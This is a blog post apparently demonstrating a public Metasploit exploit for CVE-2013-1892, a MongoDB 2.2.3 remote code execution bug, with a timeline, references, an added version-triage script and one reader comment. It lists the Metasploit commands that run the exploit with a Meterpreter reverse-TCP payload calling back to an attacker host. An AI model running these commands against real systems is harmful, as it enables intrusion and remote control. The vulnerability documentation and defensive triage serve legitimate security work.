CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix on 2013-03-24
Metasploit PoC provided on 2013-03-27

PoC provided by :

agix

Reference(s) :

CVE-2013-1892
OSVDB-91632
BID-58695

Affected version(s) :

MongoDB 2.2.3 and previous
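
The affected range above can be checked against version strings collected from an asset inventory. The Python below is an added example, not part of the original post or of the Metasploit module. The host names and banner strings are constructed, and "not-listed" only means the version is outside the range this page states.

```python
import re

# Highest affected release according to this page ("MongoDB 2.2.3 and previous").
LAST_AFFECTED = (2, 2, 3)

# Accepts "2.2.3", "v2.2.3", "2.2.4-rc0" or a longer banner containing one of them.
_VERSION_RE = re.compile(r"\bv?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?")


def parse_version(banner):
    """Return ((major, minor, patch), prerelease_or_None), or None if unparseable."""
    match = _VERSION_RE.search(banner or "")
    if not match:
        return None
    return tuple(int(part) for part in match.group(1, 2, 3)), match.group(4)


def classify(banner):
    """Map a version banner to 'affected', 'not-listed' or 'unknown'."""
    parsed = parse_version(banner)
    if parsed is None:
        return "unknown"  # no version recovered: needs a manual check
    numbers, _prerelease = parsed
    # Tuple comparison is numeric, so 2.10.0 is not mistaken for an old release.
    return "affected" if numbers <= LAST_AFFECTED else "not-listed"


def triage(inventory):
    """Group host names by status; 'affected' and 'unknown' need follow-up."""
    groups = {"affected": [], "not-listed": [], "unknown": []}
    for host, banner in inventory.items():
        groups[classify(banner)].append(host)
    return {status: sorted(hosts) for status, hosts in groups.items()}


# Constructed sample inventory (hypothetical hosts and banners).
SAMPLE_INVENTORY = {
    "db-01": "db version v2.2.3, pdfile version 4.5",
    "db-02": "db version v2.0.9, pdfile version 4.5",
    "db-03": "2.2.4-rc0",
    "db-04": "2.10.0",
    "db-05": "connection refused",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```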

Tested on Ubuntu 10.04 x86 with :

MongoDB 2.2.3

Description :

This module exploits the nativeHelper feature from SpiderMonkey, which allows an attacker to control execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.

Commands :

use exploit/linux/misc/mongod_native_helper
set RHOST 192.168.178.53
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

sysinfo
getuid

19 thoughts on “CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo”

  1. In what way is that a “spidermonkey” feature? Looks like the “native_helper” function was implemented by mongodb.
